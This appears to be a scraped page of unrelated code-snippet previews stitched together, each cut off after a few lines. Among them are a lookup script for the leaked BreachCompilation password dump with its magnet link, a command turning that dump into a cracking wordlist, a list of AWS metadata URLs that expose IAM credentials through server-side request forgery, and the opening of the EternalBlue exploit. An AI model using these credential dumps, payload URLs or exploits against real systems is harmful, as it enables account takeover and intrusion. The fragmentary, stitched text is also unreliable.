All of the following information is based on go version go1.8.3 darwin/amd64
.
(Bold = supported by go
out of the box, ie. without the help of a C compiler, etc.)
android
darwin
-----BEGIN PGP MESSAGE----- | |
jA0ECQMC8hyc6JjPLL7/0sDkAVL4fLKAOvf6pE03gaCIUerO/PAZLWO/sf4TzdwD | |
IbW5V5PgCkEIaQCwo4onbtBb6oLYJ9JQ6L+Hva6hW55fZOMCnWJY62vwPv6VmJNi | |
bvgImXWFuMUT7EUREaAcUL1rbbHEz7xRSzXMH18lf5EbV7Ry0XIsmHJBOWhhp68Z | |
8Rq+TbEqzX2RT9a443lwQx4v527qYOoHsAjRBX8mnR3GvGJ0y/4PtGzzWoBO41I9 | |
9i36Tbo/dSVKw/k4deTTxacZPscPcXfebAfTlLEeS/w/WlC28O1UkZEAb+4eu5I1 | |
clSGc0wU5v/Z3/pidTWoHUp3+/V3NeR9UZ9UWXq9JxTg8FOL+TC6sASoce8obJgy | |
O7jd8/B00naP5U95yzgcBI3vl0phYNp7Md1CBljqz31CzKjnd1SDKAGaVcd4A/5j | |
w0kAEHbCISoKocBWdFV2EjwCZYuzK8W6HpfyC0XfQmTJQ6xldzom1W0DkAnGlnKv |
# version: v4.0.1 | |
OpenCL Info: | |
Platform ID #1 | |
Vendor : Apple | |
Name : Apple | |
Version : OpenCL 1.2 (Sep 12 2017 16:28:17) | |
Device ID #1 | |
Type : CPU |
\Downloads\hashcat-4.0.1>hashcat64.exe -I | |
hashcat (v4.0.1) starting... | |
OpenCL Info: | |
Platform ID #1 | |
Vendor : Intel(R) Corporation | |
Name : Intel(R) OpenCL | |
Version : OpenCL 1.2 |
#!/bin/bash | |
# query.sh from BreachCompilation - magnet:?xt=urn:btih:7ffbcd8cee06aba2ce6561688cf68ce2addca0a3 | |
# works with older bash versions. | |
# patch by Willem <itsme@xs4all.nl> | |
dir=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd ) | |
if [ "$1" != "" ]; then | |
word1=$(echo $1 | tr A-Z a-z) | |
letter1=$(echo $word1|cut -b1) | |
if [[ $letter1 == [a-zA-Z0-9] ]]; then |
wordlist created from original 41G stash via: | |
grep -rohP '(?<=:).*$' | uniq > breachcompilation.txt | |
Then, compressed with: | |
7z a breachcompilation.txt.7z breachcompilation.txt | |
Size: |
tcpdump -ni eth0 -X -s0 not host ${SSH_CLIENT%% *} |
## AWS | |
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
http://169.254.169.254/latest/user-data | |
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
http://169.254.169.254/latest/meta-data/ami-id | |
http://169.254.169.254/latest/meta-data/reservation-id | |
http://169.254.169.254/latest/meta-data/hostname | |
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key |
#!/usr/bin/python | |
from impacket import smb | |
from struct import pack | |
import os | |
import sys | |
import socket | |
''' | |
EternalBlue exploit for Windows 8 and 2012 by sleepya | |
The exploit might FAIL and CRASH a target system (depended on what is overwritten) |